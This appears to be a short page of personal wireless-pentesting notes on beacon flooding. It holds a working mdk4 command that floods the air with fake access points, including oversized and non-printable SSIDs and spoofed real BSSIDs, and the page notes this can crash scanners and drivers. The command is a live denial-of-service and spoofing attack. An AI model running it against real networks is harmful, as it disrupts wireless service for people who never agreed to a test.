> For the complete documentation index, see [llms.txt](https://hackzzz.gitbook.io/welcome/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hackzzz.gitbook.io/welcome/everything-about-and-notes/wireless-pentesting/beacon-flooding.md).

# Beacon Flooding

## Intro

This is a fun attack, but you can crash network scanners and even drivers! In this attack the attacker **creates a lot of fake access points**.

<figure><img src="https://www.cse.wustl.edu/~jain/cse571-07/ftp/wireless_hacking/fig3.gif" alt=""><figcaption></figcaption></figure>

```
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS. This is to use BSSIDS that really exists
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
```
